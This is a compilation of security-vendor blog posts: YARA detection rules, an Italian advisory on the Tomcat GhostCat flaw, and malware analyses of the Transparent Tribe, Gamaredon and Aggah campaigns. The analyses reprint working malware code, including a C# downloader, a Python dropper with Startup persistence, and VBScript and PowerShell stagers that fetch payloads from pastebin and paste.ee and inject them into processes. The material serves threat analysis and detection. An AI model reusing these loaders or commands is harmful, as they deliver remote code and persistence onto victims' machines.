Yara Rules

import "pe"
rule Remcos_RAT_COVID19_Feb_2020 {
    meta:
      description = "Yara rule for the Remcos RAT Feb_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-25"
      tlp = "white"
      category = "informational"
    
strings:
      	 $a1 = {ED C3 37 D7 6F C7 E0 2F 7B BA DA}
     	 $a2 = {4D 53 56 42 56 4D 36 30}
	 $a3 = "VB5!6&*"
	 $a4 = "Khedivi"
	 $a5 = "|dbdU79?B_|"
	 $a6 = "Altsaxu1"
	  
    condition:
      uint16(0) == 0x5A4D and pe.number_of_sections == 3 and (3 of ($a*)) 
}

This blog post was authored by Davide Testa, Maria Francesca Lepore, Antonio Pirozzi and Luca Mella of Cybaze-Yoroi ZLAB

Grave Vulnerabilità in Apache Tomcat (GhostCat)

Proto: N050220.

Con la presente Yoroi desidera informarLa riguardo alla recente scoperta di una grave vulnerabilità all’interno dei Apache Tomcat, noto Application Server utilizzato per la realizzazione applicazioni anche in ambienti enterprise. La criticità è nota con l’alias “GhostCat”, referenziata con gli identificativi CVE-2020-1398 e CNVD-2020-10487. 

La problematica è causata da lacune nella gestione degli input utente all’interno del connettore AJP (Apache JServ Protocol) di Tomcat, utilizzato per integrare l’application server in architetture bilanciate o a valle di reverse proxy. Tali lacune rendono possibile ad un attaccante remoto privo di autenticazione di prelevare file di configurazione di sistema, permettendogli così di recuperare credenziali amministrative utilizzabili per accedere abusivamente ai server bersaglio, compromettendone i dati e la sicurezza delle reti locali. Inoltre, il connettore AJP risulta abilitato di default nelle configurazioni di Tomcat sulla porta di rete 8009. 

Il Manutentore ha risolto la problematica rilasciando nuove versioni di Apache Tomcat 7, 8 e 9, ma non della versione 6 in quanto fuori supporto. In particolare risultano afflitte dalla vulnerabilità le versioni:

Per via della potenziale diffusione di servizi e applicazioni basate su Apache Tomcat, della recente pubblicazione di dettagli tecnici e strumenti volti a sfruttare la vulnerabilità. Yoroi consiglia di limitare l’esposizione di rete del connettore AJP e di applicare gli aggiornamenti resi disponibili dal Manutentore. 

Nel caso non sia possibile applicare celermente le patch, Yoroi consiglia di valutarne la disabilitazione del connettore qualora non utilizzato, oppure di proteggere il connettore tramite password attraverso l’inserimento della direttiva “secret” oppure “requiredSecret” all’interno del file di configurazione “/conf/server.xml”. 

Figura. Esempio configurazione connettore AJP protetto da password.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index.

Transparent Tribe: Four Years Later

Introduction

Operation Transparent Tribe was first spotted by Proofpoint Researchers in Feb 2016, in a series of espionages operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RAT are capable of exfiltrate information, take screenshot and record webcam streams.

This threat actor has been vanished for a long period, and only the last month appeared another time probably for the actual tensions between two countries. We noticed that the TTP of the group are almost the same leveraging a weaponized document with a fake certificate of request of an Indian public fund. So, Cybaze-Yoroi ZLab team decided to dive deep into a technical analysis.

Technical Analysis

Hash662c3b181467a9d2f40a7b632a4b5fe5ddd201a528ba408badbf7b2375ee3553
ThreatNew Operation Transparent Tribe Campaign
Brief DescriptionMalicious macro document of the new Campaign of Transparent Tribe
Ssdeep24576:Nh2axIaansJlyJ1prFnFmbX3ti6iEIb+R9mSXH9tBUnTqHT:Nhfx4nsPyJ1ppnEX3UCICRhXHXe

Table 1. Static information about the malicious macro 

The document presents itself as a request for a DSOP FUND (Defence Services Officers Provident Fund). It is a fund where an officer compulsorily deposits some money to Govt on a monthly basis out of his wages / salary. 

The Found is a financial planning for defense personnel. The money is kept by the government and in return a “non-permanent” profit officially titled as “interest” is given back to the officers at the end of each year. The DSOP fund scheme has been setup as a “welfare measure” to the depositors while the wages remain barely meeting ends otherwise.

Self-Extracting Macro

Analyzing the content of the Excel file, we notice that the file contains all the necessary components to perform the infection:

The macro is not heavily obfuscated. The macro components are hidden as Hex or Decimal strings, which will be combined with each other to unleash the next stage of the infection.

Then it is possible to deobfuscate them.

The macro creates two folders inside %PROGRAMDATA% path, “systemidleperf” and “SppExtComTel”. 

Analyzing these files, we have a vbs script, a C# script and a zip file, inside this archive we found 4 PE artifacts:

The SilentCMD Module

The two dll are legit windows library and are used in support of the malicious behaviour. Instead, the “windproc.scr” and “windprocx.scr” files are the compiled version of the utility SilentCMD publicly available on GitHub. SilentCMD executes a batch file without opening the command prompt window. If required, the console output can be redirected to a log file.

The SilentCMD utility is used to execute the commands pushed from the C2, and all of them will be executed without showing anything to the user. However, as previously mentioned, it is curious to notice that the malware installs two different variants of the executable, with the only difference in timestamp:

The Real Time Module

The other extracted file is the “Realtime.cs” file, which is the source of a piece of code written in C#, and it is compiled and run during the execution of the macro. The code is very simple and it has the only purpose to download another component from the internet: 

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
namespace Realtime
{
    class Program
    {
        static void Main(string[] args)
        {
            
            WebClient wc = new WebClient();
            wc.DownloadFile("http://www.awsyscloud.com/x64i.scr", @"c:\\programdata\\systemidleperf\\x64i.scr");
            Process proc = new Process();
            proc.StartInfo.FileName = Convert.ToString(args[0]);
            proc.StartInfo.Arguments = "/c " + Convert.ToString(args[1]);
            proc.StartInfo.UseShellExecute = false;
            proc.StartInfo.CreateNoWindow = false;
            proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            proc.Start();
            Environment.Exit(0);
            //Application.Exit();
            /* if (!proc.Start())
             {
                 //Console.WriteLine("Error starting");
                 return;
             }*/
            //proc.WaitForExit();
        }
    }
}

The code is really simple, it has the function of downloading the file “x64i.scr” from the dropurl “awsysclou[.com” and then saves it into the folder “c:\programdata\systemidleperf\”. The file is immediately executed through the C# primitives.

The X64i.scr File

Hash7b455b78698f03c0201b2617fe94c70eb89154568b80e0c9d2a871d648ed6665
ThreatNew Operation Transparent Tribe Campaign
Brief DescriptionPython stub malware of the new Campaign of Transparent Tribe
Ssdeep196608:jXm2jfTjEzWt7+eW3TAPHULULN3erOAjsjAbpSzZTfuHO0y7:Lm2jfTgWt65U4UL9eCDHzZfyG7
Icon

Table 2. Static information about the Pyhton Stub

The icon of the executable let us understand that the malware has been forged through the usage of the tool Pyinstaller. It is a tool that permits a user to create a complete self-contained executable starting from a python source code. However, the two main disadvantages of choosing this solution are the high footprint of the executable (reaching more than 7.5MB and this generates a lot of noise inside the system); and the easiness to reverse the executable to obtain the source code.

So, after the operation of reversing, the extracted code of the malware is the following:

from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform
import ctypes
import _winreg
import time
import os
import platform
import binascii
import _winreg
import subprocess
bitstream3 = "PAYLOAD_ONE"
bitstream4 = "PAYLOAD_TWO"
oses = os.name
systems = platform.system()
releases = platform.release()
architectures = platform.architecture()[0]
    
def main():
  try:
    runsameagain()
  except Exception as e:
      print str(e)
  
def runsameagain():
    global bitstream3
    binstr = bytearray(binascii.unhexlify(bitstream3))
    if not os.path.exists("c:\programdata\SppExtComTel"):
        os.makedirs("c:\programdata\SppExtComTel")
    WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr);
    bootup()
    subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance'])
  
def rundifferentagain():
    global bitstream4
    binstr = bytearray(binascii.unhexlify(bitstream4))
    if not os.path.exists("c:\programdata\SppExtComTel"):
        os.makedirs("c:\programdata\SppExtComTel")
    WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr);
    bootup()
    subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance'])
  
def Streamers():     
 try:                               
    rundifferentagain()
    return 1               
 except Exception as e:
    print str(e)
    
def WriteFile(filename,data):
    with open(filename,"wb") as output:
  output.write(data)
  
  
def bootup():
    try:
        from win32com.client import Dispatch
        from win32com.shell import shell,shellcon
  dpath = "c:\programdata\SppExtComTel"
        #print "before"
  Start_path = shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0)
  com_path = os.path.join(Start_path, "SppExtComTel.lnk")
  target = os.path.join(dpath,"SppExtComTel.scr")
  wDir = dpath
  icon = os.path.join(dpath, "SppExtComTel.scr")
  shell = Dispatch('WScript.Shell')
  shortcut = shell.CreateShortCut(com_path)
  shortcut.Targetpath = target
  shortcut.WorkingDirectory = wDir
  shortcut.IconLocation = icon
  shortcut.save()
        #print "there"
        #return True
    except Exception, e:
        print str(e)
    
if __name__ == "__main__":
  try:
      #print oses
      #print systems
      #print releases
      #print architectures
      if '.py' not in sys.argv[0]:
    #sys.exit()
                #print "nothign to do"
                if systems == 'Windows' and releases == "7":
                    main()
                elif systems == 'Windows' and (releases == "8.1" or releases == "8"):
                    Streamers()
                elif systems == 'Windows' and releases == "10":
                    #print "Please use a 64 bit version of python"
                    #print "entering streamers"
                    Streamers()
                else:
                    Streamers()
  except Exception as e:
    print str(e)

Code snippet 2 

The python code is very simple to analyze and to explain. The first operation is to declare two global variables, “bitstream3” and “bitstream4”. They are the hexadecimal representation of two PE files, that will be deepened in the next sections. These two files are chosen according to the Windows OS version, as visible at the bottom of the code.

After that, the script writes the desired payload into the folder “c:\programdata\SppExtComTel\” and immediately executed it with the parameter “–brilliance”. After that, the malware guarantees its persistence through the  creation of a LNK file inside the Startup folder.

The RAT

As previously stated, the malware payload is the core component of the malware implant. 

As shown in the above figure, the malware is written in .NET framework and the creation date back to 29 Jan 2020. It is the date of the beginning of the malware campaign, also demonstrated by the registration records of the C2. The malware consists of a modular implant that downloads other components from the C2.

The first operation is to provide to the C2 a list of the running processes on the victim machine: 

The method used to send the information to the C2 is the following:

Figure 11: C2 communication routine

After that, the malware loops in a cycle and waits for some commands coming from the C2:

Figure 12: Routine for the download of new modules

When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs:

The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: 

When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs:

The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: 

Figure 13: Evidence of the decrypting routine of the certificate

The above screen shows that the malware requests for an RSA key, which has to be validated by the highlighted text. If the check is positive, the malware can go on to its malicious actions, such as sending of information: 

Figure 14: Sending routine of the malware

The second malware module is a simple DLL having the purpose to download other components from the dropURL and then install it:

Figure 15: Evidence of the hard coded AES key

The downloaded code has been encrypted through the Rijndael algorithm with a hard coded key.

Conclusion

Transparent tribe is back with a new campaign after several years of (apparently) inactivity. We can confirm that this campaign is completely new, relying on the registration record of the C2 that dates back to 29 January 2020. The decoy document presents itself as a request for a DSOP FUND  (Defence Services Officers Provident Fund) a providence fund for official and military personnel, confirming the espionage and counterintelligence character of this campaign. 

At last, we have no certainty that this campaign has been inactive for 4 years, it may be that it acted quietly, but, now the cyber criminal group is back in view of today’s tensions between the two countries.

Indicators of Compromise

Yara Rules

rule TransparentTribe_Malicious_Macro_Jan_2020 {
    meta:
      description = "Yara rule for the Transparent Tribe Malicious Macro Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {8B 92 BC BE 87 95 BF BD 83}
      $a2 = {D6 8C C7 68 D5 8D C0 69 D4 8E}
	  $b1 = "161,36,31,130,137,165,44,167,244,55,198,100,241"
    condition:
      all of them
}

rule TransparentTribe_PythonStub_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe Python Stub Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {70 56 6B 77 86 FB D2 6D 2C}
      $a2 = {A2 43 F9 97 61 F4 E5 1F D7 02}
	  $b1 = "bpyexpat.pyd"
	  $b2 = "bmfc90u.dll"
	  
    condition:
      uint16(0) == 0x5A4D and all of them and filesize > 7MB
}

rule TransparentTribe_CrimsonRAT_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe CrimsonRAT Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {03 06 11 24 03 06 11 20 03}
      $a2 = {B0 3F 5F 7F 11 D5 0A 3A 04}
	  $b1 = "SppExtComTel"
	  
    condition:
      uint16(0) == 0x5A4D and all of them and filesize > 7MB
}

rule TransparentTribe_MaliciousDLLModule_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe CrimsonRAT Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {00 F1 01 8D 19 71 00 F1 01 7D 06 71}
      $a2 = {86 08 4E 03 57 00 59 00 CC}
	  $a3 = "6f6e6c79706172616e6f696473757276697665" ascii wide
  	  $a4 = "shemypolandar*kotlin" ascii wide
	  $b1 = "FC4302A8973108F7B86565D5A49182DED2B0BF31"
	  $b2 = "PrivateMemorySize64"
	  $b3 = "Hi0-78LoupIks2jMn" wide
    condition:
      uint16(0) == 0x5A4D and (all of ($a*) or all of ($b*)) 
}

This blog post was authored by Luigi Martire, Pietro Melillo and Antonio Pirozzi of Cybaze-Yoroi ZLAB

Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign

Introduction 

Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB (Federal Security Service) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power. 

Gamaredon has been active since 2014, and during this time, the modus operandi has remained almost the same. The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines. It is distributed in a spear phishing campaign with a weaponized office document that appears to be designed to lure military personnel. 

In the recent months, Ukrainian CERT (CERT-UA) reported an intensification of Gamaredon Cyberattacks against military targets. The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez. Starting from those findings, Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant.

Technical Analysis

The complex infection chain begins with a weaponized Office document named “f.doc”. In the following table the initial malware information is provided.

Hash76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
ThreatGamaredon Pteranodon weaponized document
Brief DescriptionDoc file weaponized with Exploit
Ssdeep768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir:uG1aKQ5OwCrItq3TgGfLt9r

Table 1. Information about initial dropper

The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it, and, once opened, it appears as in the following figure.

Figure 1. Overview of the document

The document leverages the common exploit aka template injection and tries to download a second stage from “hxxp://win-apu.]ddns.]net/apu.]dot”.

Figure 2. URL used by document to download the second stage

Thanks to this  exploit (Remote Code Execution exploit) the user interaction is not required, in fact the “enable macro” button is not shown. The downloaded document has a “.dot” extension, used by Microsoft Office to save templates for different documents with similar formats. Basic Information on the “.dot” file are provided:

Hashe2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
ThreatGamaredon Pteranodon loader dot file
Brief DescriptionDot file enabling the infection of the Gamaredon Pteranodon
Ssdeep768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ:oI8XoWruHpp/P4

Table 2. Information about second stage

If we decide to open the document, we see that the document is empty, but it requires the enabling of the macro.

Figure 3. Overview of the second stage document

The body of the macro can be logically divided into two distinct parts: 

Figure 4. Code of the “template.vbs” stored in the Startup folder

The evidence of the written file in the Startup folder:

Figure 5. Evidence of the “template.vbs” file in the Startup folder

Analyzing the content of “templates.vbs” it is possible to notice that it define a variable containing a URL like “hxxp://get-icons.]ddns.]net/ADMIN-PC_E42CAF54//autoindex.]php” obtained from "hxp://get-icons.]ddns.]net/" & NlnQCJG & "_" & uRDEJCn & "//autoindex.]php", where “NlnQCJG” is the name that identifies the computer on the network and “uRDEJCn” is the serial number of drive in hexadecimal encoding. From this URL it tries to download another stage then storing it into “C:\Users\admin\AppData\Roaming\” path with random name. At the end, “templates.vbs” script will force the machine to reboot. 

Figure 6. Function used to force machine reboot

The dropped sample is an SFX archive, like the tradition of Gamaredon implants.

Hashc1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f
ThreatGamaredon Pteranodon implant SFX archive
Brief DescriptionSFX Archive First Stage 
Ssdeep24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv:zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv

Table 3. Information about first SFX archive

By simply opening the SFX archive, it is possible to notice two different files that are shown below and named respectively “8957.cmd” and “28847”. 

Figure 7. Content of the Gamaredon Pteranodon  SFX archive

When executed, the SFX archive will be extracted and the “8957.cmd” will be run. The batch script looks like the following screen:

Figure 8. Bat script source code (with junk instructions)

It contains several junk instructions with the attemption to make the analysis harder. Cleaning the script we obtain:

Figure 9. Batch script source code (cleaned)

At this point, the batch script renames the “28847” file in “28847.exe”, opens it using “pfljk,fkbcerbgblfhs” as password and the file contained inside the “28847.exe” file will be renamed in “WuaucltIC.exe”. Finally, it will be run using “-post.php” as argument.

The fact that the “28847.exe” file can be opened makes us understand that  the “28847” file is another SFX file. Some static information about SFX are:

Hash3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1
ThreatGamaredon Pteranodon implant SFX archive
Brief DescriptionSFX Archive Second Stage
Ssdeep24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM:OoZwxVvfoaPu

Table 4. Information about the second SFX archive

Exploring it, it is possible to see several files inside of it,  as well as the 6323 file. The following figure shows a complete list.

Figure 10. Content of the second SFX archive

In this case, the SFX archive contains 8 files: five of them are legit DLLs used by the “6323” executable to interoperate with the OLE format defined and used by Microsoft Office. The “ExcelMyMacros.txt” and “wordMacros.txt” files contain further macro script, described next. So, static analysis on the “6323” file shown as its nature: it is written using Microsoft Visual Studio .NET, therefore easily to reverse. Before reversing the executable, it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code. The below image shows the information about the sample before and after the cleaning. 

Figure 11. Static information about .NET sample before and after the cleaning

The source code looks as follows. 

Figure 12. Part of .NET sample source code

The first check performed is on the arguments: if the arguments length is equal to zero, the malware terminates the execution. After that, the malware checks if the existence of the files “ExcelMyMacros.txt” and “wordMacros.txt” in the same path where it is executed: if true then it reads their contents otherwise it will exit. 

Figure 13. Function used by .NET sample to check the presence of the “WordMacros.txt” and the “ExcelMyMacros.txt” files”

Part of the content of the variable “xVGlMEP”:

Figure 14.Piece of the “WordMacros.txt” code

There is a thin difference between the two files. 

Figure 15. Difference between “WordMacros.txt” and  “ExcelMyMacros.txt” files”

As visible in the previous figure, the only difference between the files are in the variable, registry key and path used by Word rather than by Excel. Finally the macros are executed using the Office engine like in the following figure. 

Figure 16. Winword with malicious macro

So let’s start to dissect the macros. For a better comprehension we will be considering only one macro and in the specific case we will analyze “wordMacros.txt”  ones. First of all the macro will set the registry key "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & _"\Word\Security\" and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes: the first one will run a “IndexOffice.vbs” in the path “%APPDATA%\Microsoft\Office\” and the second one will run “IndexOffice.exe” in the same path. 

Figure 17. Registry keys and Scheduled tasks set by malware

Finally, the malware will write the “IndexOffice.txt” file in the  “%APPDATA%\Microsoft\Office\” path. The following figure shows what has been previously described:

Figure 18. Part of “IndexOffice.txt” file

The script will check the presence of the  “IndexOffice.exe” artifact: if true then it will delete it and it will download a new file/script from “hxxp://masseffect.]space/<PC_Name>_<Hex_Drive_SN>/post.]php”. 

Figure 19. Domain “masseffect.]space” declaration and use of the Encode function

The malware tries to save the C2 response and encoding it using Encode function. This function accepts three parameters: the input file, the output file and the arrKey; arrKey is calculated thanks to  GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results. Part of Encode function and complete code of GetKey function are shown below.

Figure 20. Encode function 

Figure 21. Function GetKey

Visiting the web page relative to C2, it shows a “Forbidden message” so this means that the domain is still active but refuses incoming requests.

Figure 22. Browser view of the URL “masseffect.]space” 

Conclusion

Gamaredon cyberwarfare operations against Ukraine are still active. This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years. 

The massive use of weaponized Office documents, Office template injection, sfx archives, wmi and some VBA macro stages that dinamically changes,  make the Pterodon attack chain very malleable and adaptive. However, the introduction of a .Net component is a novelty compared to previous Pterodon samples.

Indicator of Compromise

Hashes

Persistence

URL

C2

Yara Rule

rule Gamaredon_Campaign_Genuary_2020_Initial_Dropper {
	meta:
  	description = "Yara Rule for Gamaredon_f_doc"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 4B 03 }
	 $a2 = { 8E DA 30 14 DD 57 EA 3F }
	 $a3 = { 3B 93 46 0F AF B0 2B 33 }
	 $a4 = { 50 4B 03 04 14 00 06 00 08 }

    condition:
   	 all of them
}
rule Gamaredon_Campaign_Genuary_2020_Second_Stage {
	meta:
  	description = "Yara Rule for Gamaredon_apu_dot"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = "Menu\\Programs\\Startup\\\""
	 $a2 = "RandStrinh"
	 $a3 = ".txt"
	 $a4 = "templates.vbs"
	 $a5 = "GET"
	 $a6 = "Encode = 1032"
	 $a7 = "WShell=CreateObject(\"WScript.Shell\")"
	 $a8 = "Security"
	 $a9 = "AtEndOfStream"
	 $a10 = "GenRandom"
	 $a11 = "SaveToFile"
	 $a12 = "Sleep"
	 $a13 = "WinMgmts:{(Shutdown,RemoteShutdown)}!"
	 $a14 = "Scripting"
	 $a15 = "//autoindex.php"

    condition:
   	 11 of ($a*)
}
rule Gamaredon_Campaign_Genuary_2020_SFX_Stage_1 {
	meta:
  	description = "Yara Rule for Gamaredon SFX stage 1"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 4D 5A }
	 $a2 = { FF 75 FC E8 F2 22 01 00 }
	 $a3 = { FE DE DB DB FE D5 D5 D6 F8 }
	 $a4 = { 22 C6 24 A8 BE 81 DE 63 }
	 $a5 = { CF 4F D0 C3 C0 91 B0 0D }

    condition:
   	 all of them
}
rule Gamaredon_Campaign_Genuary_2020_SFX_Stage_2 {
	meta:
  	description = "Yara Rule for Gamaredon SFX stage 2"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 4D 5A }
	 $a2 = { 00 E9 07 D4 FD FF 8B 4D F0 81 }
	 $a3 = { B7 AB FE B2 B1 B5 FA 9B 11 80 }
	 $a4 = { 81 21 25 E0 38 03 FA F0 AF 11 }
	 $a5 = { 0A 39 DF F7 40 8D 7B 44 52 }

    condition:
   	 all of them
}
rule Gamaredon_Campaign_Genuary_2020_dot_NET_stage {
	meta:
  	description = "Yara Rule for Gamaredon dot NET stage"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 4D 5A }
	 $a2 = "AssemblyCompanyAttribute"
	 $a3 = "GetDrives"
	 $a4 = "Aversome"
	 $a5 = "TotalMilliseconds"
	 $s1 = { 31 01 C6 01 F2 00 29 01 5C 03 76 }
	 $s2 = { 79 02 38 03 93 03 B5 03 }
	 $s3 = { 00 07 00 00 11 00 00 72 01 }
	 $s4 = { CD DF A6 EF 66 0E 44 D7 }

    condition:
   	 all of ($a*) and 2 of ($s*)
}

This blog post was authored by Davide Testa, Luigi Martire and Antonio Pirozzi of Cybaze-Yoroi ZLAB.

Aggah: How to run a botnet without renting a Server (for more than a year)

Introduction

During the last year, we constantly kept track of the Aggah campaigns. We started deepening inside the Roma225 Campaign and went on with the RG Campaign, contributing to the joint effort to track the offensive activities of this threat actor.

Recently, during our Cyber Defence monitoring operations, we spotted other attack attempts directed to some Italian companies operating in the Retail sector. For this reason, the  Cybaze-Yoroi ZLab team decided to dissect this last Aggah campaign and track its latest variations.

Technical Analysis

Hash77bbd615bc5b34ce007a82a7f365426fc1091ed7eeca3b3888d35b8242288184
ThreatYakka3 Campaign
Brief DescriptionMalicious ppa file dropper with macro
Ssdeep1536:LEFGlBGHLAegbRrnDKSeJ8SuXCak5w/PYvwgqTtCxqTyU2wCNkY:LplBKLAegbRrnDKSeJ8SuXXk5ALgqd2

Table 1. Sample information

The initial file is a Microsoft PowerPoint PPA file. It actually is an Add-in file designed to add new behavior to the classic PowerPoint presentations, in this case to add a nasty macro:

Figure 1: Piece of the malicious macro

The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform.

Figure 2: Result of the Bit.ly link

The HTML page closely matches the modus operandi of the previous Aggah threat. In this case, the blogspot post is named “20sydney new” but it uses the same trick from the past: hiding the javascript stager code inside the web page, an ad hoc code snippet which will be interpreted and executed only by the mshta engine.

Figure 3: Malicious code hidden in the Blogspot web page and executed by the MSHTA engine

The parameter passed the “unescape()” function results in another two layers of encoded strings, adopting a sort of “matrioska unecape obfuscation”. After these layers, we recovered the malicious logic of the stager:

<script language="VBScript">
Set M_c = CreateObject(StrReverse("llehS.tpircSW"))
Dim L_c
L_c = StrReverse("exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc")
M_c.Run L_c, vbHide

set Ixsi = CreateObject(StrReverse("llehS.tpircSW"))
Dim Bik
Bik1 = "mshta http:\\pastebin.com\raw\JELH48mw"
Ixsi.run Bik1, vbHide

set nci = CreateObject(StrReverse("llehS.tpircSW"))
Dim xx
xx1 = "r ""mshta http:\\pastebin.com\raw\JELH48mw"" /F "
xx0 = StrReverse("t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs")
nci.run xx0 + xx1, vbHide

Set ll = CreateObject(StrReverse("llehS.tpircSW"))
no = StrReverse("mmetsaP\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH")
ll.RegWrite no,"mshta http:\\pastebin.com\raw\NxJCPTmQ","REG_SZ"

self.close
</script>

Code Snippet 1

The first part of this initial implant aims to kill the Word and Excel processes. Immediately after that, the malware downloads other code through leveraging mshta once again, this time from a pastebin snippet.

Figure 4: Piece of the malicious Pastebin

The author of this pastes is no more “HAGGA”, as seen in our previous analysis, now the he moved to another one: “YAKKA3”:

Figure 5: Evidence of YAKKA3 Pastebin user

The paste was created on the 25th November 2019 and it has likely been edited many times in the course the last month. In the past Aggah was frequently changing the content of his pastes to modify the malware behaviour and drop many kinds of malware. On some occasions, some of them suspected to be related to the Gorgon APT group. Anyway, during the analysis, the content of the encoded string is the following:

<script language="VBScript">
Set MVn = CreateObject(StrReverse("llehS.tpircSW"))

Mcn = "powershell do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/Zhs3s')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/Fk9yH').replace('*','0x')|IEX;[vroombrooomkrooom]::kekedoyouloveme('calc.exe',$f)"

MVn.Run Mcn, vbHide


self.close
</script>

Code Snippet 2

The above script is a piece of VBS script designed to run some other Powershell loader. The powershell script tests the internet connectivity by pinging to google.com and then starts the infection. The script downloads two other pastes. The first is a PE file and the second one is a custom .NET process injection utility.

The Injector

Hashb8f6cad3723d1dd2219d02f930e5cda776c124387f19f3decd867495ce614eb7
ThreatYakka3 Campaign
Brief DescriptionInjector through process hollowing
Ssdeep384:0UUX1vfjRPJok0e9i3h3i91/EPK59732wag7lRa3oNU1XURDlK67qfM9Wi:0X1qH3hBPU3B7K4NUJCDCfM

Table 2. Sample information of the injector 

The injector component is invoked through its static method “[vroombrooomkrooom]::kekedoyouloveme('calc.exe',$f)”, as seen in the code snippet 2. The only purpose of this component is to inject a payload inside the memory of another one process, as indicated in the parameter.

Figure 6: Write Process Memory technique

The injection technique is very basic. In fact the injection uses the textbook  “CreateRemoteThread” technique, well documented and used actively implemented by many actors and malware developers. 

Figure 7: Injected payload inside calc.exe process

UAC Bypass Tool

In Code Snippet 1 we saw that the aggah implant persists on the target machine by setting the “mshta http:[\\pastebin.]com\raw\NxJCPTmQ” command into the Registry Key “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm”, so, it potentially loads different payloads on every run.

Figure 8: Piece of the malicious script executed by the persistence mechanism

Unlike previous pastes, the author of this one is YAKKA4. Probably, a form of redundancy in case of take down of the other accounts. 

Figure 9: YAKKA4 evidence

Anyway, the code served by this paste downloads another binary file from an additional Paste site: paste.ee.

<script language="VBScript">

Set i9i9 = CreateObject("W" + "S" + "c" + "r" + "i" + "p" + "t" + "." + "S" + "h" + "e" + "l" + "l")
